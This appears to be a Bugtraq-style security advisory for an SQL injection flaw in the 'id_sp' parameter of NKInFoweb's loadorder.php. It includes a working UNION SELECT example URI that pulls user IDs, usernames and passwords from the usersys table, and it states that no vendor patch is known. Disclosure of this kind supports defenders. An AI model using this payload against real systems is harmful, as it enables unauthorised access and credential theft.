NKInFoweb 'id_sp' Parameter SQL Injection Vulnerability
BID:39689
Info
NKInFoweb 'id_sp' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 39689 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 23 2010 12:00AM |
| Updated: | Apr 23 2010 12:00AM |
| Credit: | d4rk-h4ck3r |
| Vulnerable: |
NKINFO WEB NKInFoweb 5.2.2.0 NKINFO WEB NKInFoweb 2.5 |
| Not Vulnerable: | |
Exploit / POC
NKInFoweb 'id_sp' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/loadorder.php?id_sp=-17+union+select+1,2,3,concat(0x3a3a3a,id_usersys,0x3a,usersys,0x3a,pwdsys,0x3a3a3a),5,6,7,8,9,10,11+from+usersys--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/loadorder.php?id_sp=-17+union+select+1,2,3,concat(0x3a3a3a,id_usersys,0x3a,usersys,0x3a,pwdsys,0x3a3a3a),5,6,7,8,9,10,11+from+usersys--
Solution / Fix
NKInFoweb 'id_sp' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].